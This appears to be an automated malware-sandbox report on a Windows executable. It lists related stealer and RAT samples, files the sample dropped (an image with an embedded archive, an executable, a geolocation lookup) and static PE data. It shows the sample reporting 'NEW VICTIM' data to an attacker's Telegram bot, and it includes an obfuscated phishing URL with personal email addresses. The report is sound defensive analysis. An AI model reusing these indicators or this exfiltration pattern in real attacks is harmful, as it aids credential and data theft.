	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	DEC 2024 RFQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Itaxyhi.exe	Get hash	malicious	Phemedrone Stealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fWAr4zGUkY.exe	Get hash	malicious	Remcos, Amadey, Stealc	Browse	149.154.167.220
	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse	149.154.167.99
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Message_2712729.eml	Get hash	malicious	unknown	Browse	149.154.167.220
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	34.117.59.81
	Josho.mips.elf	Get hash	malicious	Unknown	Browse	34.119.80.120
	http://enteolcl.top/	Get hash	malicious	Unknown	Browse	34.117.59.81
	Product Blueprint..html	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	k5NcGFI29j.exe	Get hash	malicious	Jigsaw	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse	149.154.167.220 142.250.181.65 172.217.17.46 34.117.59.81
	jN6irWtNiG.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220 142.250.181.65 172.217.17.46 34.117.59.81
	yOmgCWM83b.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220 142.250.181.65 172.217.17.46 34.117.59.81
	copia111224mp.hta	Get hash	malicious	Unknown	Browse	149.154.167.220 142.250.181.65 172.217.17.46 34.117.59.81
	Agreement for Cooperation.PDF.lnk.download.lnk	Get hash	malicious	RedLine	Browse	149.154.167.220 142.250.181.65 172.217.17.46 34.117.59.81
	Agreement for YouTube cooperation.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220 142.250.181.65 172.217.17.46 34.117.59.81
	Strait STS.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220 142.250.181.65 172.217.17.46 34.117.59.81
	c2.hta	Get hash	malicious	XWorm	Browse	149.154.167.220 142.250.181.65 172.217.17.46 34.117.59.81
	peks66Iy06.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 142.250.181.65 172.217.17.46 34.117.59.81
	XXHYneydvF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 142.250.181.65 172.217.17.46 34.117.59.81

Process:	C:\Users\user\Desktop\file.exe
File Type:	PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	156917
Entropy (8bit):	7.994509354006501
Encrypted:	true
SSDEEP:	3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
MD5:	F89267B24ECF471C16ADD613CEC34473
SHA1:	C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
SHA-256:	21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
SHA-512:	C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
Malicious:	false
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, Author: ditekSHen
Reputation:	low
Preview:	.PNG........IHDR................p....IDATx....\|.e....3......D dw6...S..Y.[......#L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.\|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	123394
Entropy (8bit):	7.993523589542907
Encrypted:	true
SSDEEP:	1536:NoxiTioXtBWFfsYExW94I9tiiGCidzWdZNF9p3Ymn9Zqmi943C42nYEmL9yqhTjV:yxFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre
MD5:	53E54AC43786C11E0DDE9DB8F4EB27AB
SHA1:	9C5768D5EE037E90DA77F174EF9401970060520E
SHA-256:	2F606D24809902AF1BB9CB59C16A2C82960D95BFF923EA26F6A42076772F1DB8
SHA-512:	CD1F6D5F4D8CD19226151B6674124AB1E10950AF5A049E8C082531867D71BFAE9D7BC65641171FD55D203E4FBA9756C80D11906D85A30B35EE4E8991ADB21950
Malicious:	false
Reputation:	low
Preview:	PK........DwiY(..wj...........graph.exe..{\|...8......f....D]5..HP..d..... Q@b.1.[$.\..&.p.....j.-.V..6...=P!.U@...K....>.sf7..b...._/...3....<....oY/..A...................u....].l.(...UyWuv....\x....w.......0\|_.].e........==.m.qq....v....g...~o.........~.V?@.s.......z.......#\|.o..........~.].X...%.A......>..xZ.p.0.:.2a.U..PZ...E.^.`>......+d.9..s.x..O.....+............K.2...3...9.M......k3;j.[o.*mg..U.%!...A+.....3O6T{...o....j.:.4.]m...q.{..&...?.A....Q[.\|..x.K.X....U.\|..V/,......6...\|w.s..@0BX...O.I..._..R..@~T.2.t..IK?..M.E.\|^............B._C.....-..y;....V.......,\|f.wl......:...T./4TbV.\.+..H.....2%.sZ..D.#..}.o..x..w... ..p.!..,..o ...S.]......].}.......c.w..2...<s........!.2'....m.v.><...Ox...O.(C.....@....T.o.Uwm......(ve<...x.f3..\...D..X._.G.7.3.l;..>tQ...5.e..D...lO.i{./..;.JgK........ ...tJ. I.....>..8..Pa...=.Il.S..?.)..@}...:..Cmh.;.v...T.{K..9.)Pqg.%..5.....6..<w..........`-..+h..oA...2.K.......{.."..Wu.;I..w.^o...

C:\Program Files\Windows Media Player\graph\graph.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	251392
Entropy (8bit):	6.173345887744036
Encrypted:	false
SSDEEP:	6144:TxwndeWCdXSpfDYlUgEP86yZ7JUlfQEc:Tx1dXYYlLEP8l7J8
MD5:	7D254439AF7B1CAAA765420BEA7FBD3F
SHA1:	7BD1D979DE4A86CB0D8C2AD9E1945BD351339AD0
SHA-256:	D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
SHA-512:	C3164B2F09DC914066201562BE6483F61D3C368675AC5D3466C2D5B754813B8B23FD09AF86B1F15AB8CC91BE8A52B3488323E7A65198E5B104F9C635EC5ED5CC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.1!am_ram_ram_r.\sdm_r.Zs.m_rq.\skm_rq.[sqm_r.[spm_rq.Zs8m_r.^shm_ram^r.m_r.Vs`m_r.r`m_r*.]s`m_rRicham_r........PE..d...../g.........."....).\|...n.................@............................. ............`.....................................................d...............`'...................A..p...........................`@..@...............h............................text....z.......\|.................. ..`.rdata..............................@..@.data...$-..........................@....pdata..`'.......(..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\sendMessage[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	776
Entropy (8bit):	5.107829270071778
Encrypted:	false
SSDEEP:	24:YKOHdy1JVBa4YGQVPe071kWdPyoZEB65basJENBm9c:YVHdQTBj/Q515PtZp9ujMc
MD5:	457B89B9CC3C7200335C3C76591DAD10
SHA1:	A1D8B11A4F7B40D0F8E81D06770024E7927147DB
SHA-256:	87747CC665FF05F8C8D87CF5CBBDD9A3E68E6D0D23BB2B10E5C96DDF48EF21B7
SHA-512:	7FF63D92E5203A2C9C74EB2F2AB53E154D07767487CB8CDD0BEA4F74AA624E4D3E57220AC727C6B18B900EE4CC13D9E6F419424F67AF215C7C0760219AD43FF9
Malicious:	false
Reputation:	low
Preview:	{"ok":true,"result":{"message_id":3314,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734018834,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 065367\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	321
Entropy (8bit):	4.99323851364312
Encrypted:	false
SSDEEP:	6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
MD5:	7225D8C283F7B303692A163301880199
SHA1:	7BF7F829E108693DB3DAD66B557EAA1DBA464D94
SHA-256:	19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
SHA-512:	05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
Malicious:	false
Reputation:	low
Preview:	{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\output[1].png

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	156917
Entropy (8bit):	7.994509354006501
Encrypted:	true
SSDEEP:	3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
MD5:	F89267B24ECF471C16ADD613CEC34473
SHA1:	C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
SHA-256:	21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
SHA-512:	C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
Malicious:	false
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\output[1].png, Author: ditekSHen
Reputation:	low
Preview:	.PNG........IHDR................p....IDATx....\|.e....3......D dw6...S..Y.[......#L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.\|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	321
Entropy (8bit):	4.99323851364312
Encrypted:	false
SSDEEP:	6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
MD5:	7225D8C283F7B303692A163301880199
SHA1:	7BF7F829E108693DB3DAD66B557EAA1DBA464D94
SHA-256:	19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
SHA-512:	05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
Malicious:	false
Reputation:	low
Preview:	{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	156917
Entropy (8bit):	7.994509354006501
Encrypted:	true
SSDEEP:	3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
MD5:	F89267B24ECF471C16ADD613CEC34473
SHA1:	C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
SHA-256:	21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
SHA-512:	C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
Malicious:	false
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, Author: ditekSHen
Reputation:	low
Preview:	.PNG........IHDR................p....IDATx....\|.e....3......D dw6...S..Y.[......#L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.\|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	776
Entropy (8bit):	5.1126764545189305
Encrypted:	false
SSDEEP:	24:YKOHjy1JVBa4YGQVPe071kW9FPyoZEB65basJENBm9c:YVHjQTBj/Q51xFPtZp9ujMc
MD5:	5D0C81853F16A49DEE18D5D4AD39F861
SHA1:	75211BA5600BE63B1CCCDCE137D22540D7A8CCA9
SHA-256:	C1E0E7B0B1BD748DE0A43813CC79363284F70BEB4B1C9F5DCC1264C6F26987E7
SHA-512:	D612C48D79ADDA8034869081334296112DA7A1D5B735D970EE5B023B935036356D83F2F6E49015433A973003E347FD500DEABC8031269315B0C459BDCD137457
Malicious:	false
Preview:	{"ok":true,"result":{"message_id":3316,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734018836,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 065367\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.377818589865092
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	605'696 bytes
MD5:	3567cb15156760b2f111512ffdbc1451
SHA1:	2fdb1f235fc5a9a32477dab4220ece5fda1539d4
SHA256:	0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
SHA512:	e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba
SSDEEP:	12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
TLSH:	E5D45C1666A800FCE1EBD238CA574513FA76B84603A19ADF13D097672F176E09F3E721
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B........v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw.....

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14004320c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6731B531 [Mon Nov 11 07:41:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	b1d65f7e4aa92d9c11708d0d9ee127a1

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F9DE9027C88h
dec eax
add esp, 28h
jmp 00007F9DE90273DFh
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F9DE9027572h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F9DE9027575h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007F9DE902756Dh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F9DE9026A3Ah
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+08h], ebx
dec eax
mov dword ptr [eax+10h], ebp
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
inc ecx
push esi
dec eax
sub esp, 20h
dec ecx
mov ebx, dword ptr [ecx+38h]
dec eax
mov esi, edx
dec ebp
mov esi, eax
dec eax
mov ebp, ecx
dec ecx
mov edx, ecx
dec eax
mov ecx, esi
dec ecx
mov edi, ecx
dec esp
lea eax, dword ptr [ebx+04h]
call 00007F9DE90274D1h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8be98	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x96000	0x448	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x91000	0x4c74	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x97000	0xb90	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x80480	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x80680	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x80340	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x70000	0x4a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6ec3e	0x6ee00	e5d9e86ceef61c40af75d00b1338553d	False	0.4871956912344983	data	6.39857414841088	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x70000	0x1ce64	0x1d000	cc5419dfe862265139bacec5ab07010e	False	0.44227337015086204	data	5.432264074009666	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x8d000	0x3bec	0x1c00	cd69d42d368ffc43ed3d9449389d5e0d	False	0.16378348214285715	DOS executable (block device driver)	3.2710072108015398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x91000	0x4c74	0x4e00	eb4cdabd0756133d95aec7355655271a	False	0.4788661858974359	data	5.735627608296407	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x96000	0x448	0x600	1e9590800244ea67bbd5f82b3a6f4221	False	0.3580729166666667	data	3.380125227099815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x97000	0xb90	0xc00	5ce72d9d30afddbdf14b43241fe9c99b	False	0.4889322916666667	data	5.370062744008093	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x960a0	0x220	data	English	United States	0.5036764705882353
RT_MANIFEST	0x962c0	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
